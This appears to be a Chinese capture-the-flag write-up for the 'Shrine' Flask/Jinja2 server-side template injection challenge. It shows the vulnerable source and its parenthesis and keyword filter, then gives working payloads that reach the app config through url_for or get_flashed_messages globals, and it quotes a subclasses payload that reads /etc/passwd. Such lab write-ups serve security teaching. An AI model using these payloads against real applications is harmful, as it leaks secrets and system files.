[CTF]攻防世界:Shrin(SSTI)

题目:攻防世界:Shrin(SSTI)

提示:题目代码

bash 复制代码
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
  1. /shrine/路由接收任意路径参数
  2. render_template_string()直接渲染用户输入
  3. 过滤机制:()被删除,config和self变量被设为None
  4. 无法使用 subclasses()、popen() 等带括号的函数
bash 复制代码
无法使用
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

步骤

1. 利用Flask全局函数访问current_app

Payload: /shrine/{{url_for.globals['current_app'].config.FLAG}}

原理:

url_for 是Flask内置全局函数,无需括号即可访问__globals__ 获取函数的全局变量字典(无括号)current_app

指向当前的Flask应用实例app 通过 current_app.config 访问被"隐藏"的配置

2. 利用get_flashed_messages

替代Payload:

/shrine/{{get_flashed_messages.globals['current_app'].config['FLAG']}}

原理:与url_for类似,利用另一个Flask全局函数绕过限制。

相关推荐
℡終嚸♂68010 分钟前
钓鱼攻击全面解析:原理、手段与实战防御
网络·安全·web安全
黄焖鸡能干四碗12 小时前
网络安全建设实施方案(Word文件参考下载)
大数据·网络·人工智能·安全·web安全·制造
Chockmans20 小时前
春秋云境CVE-2021-46436
web安全·网络安全·春秋云境·cve-2021-46436
新猿一马21 小时前
服务端安全开发注意事项
数据库·web安全·oracle
Kapibalapikapi1 天前
Web笔记 | URL跳转漏洞(开放重定向)
安全·web安全
xixixi777771 天前
从SQL注入到XSS:实战Web安全渗透测试
人工智能·安全·web安全·网络安全·卫星通信
鹅天帝1 天前
20230319网安学习日志——XSS漏洞
前端·学习·web安全·网络安全·xss
纽创信安2 天前
纽创信安与SGS启动网络安全ISO 21434认证项目
网络·安全·web安全
波兰的蓝2 天前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
上海云盾-小余2 天前
零信任安全落地实战:企业如何构建无边界可信访问体系
网络·安全·web安全·架构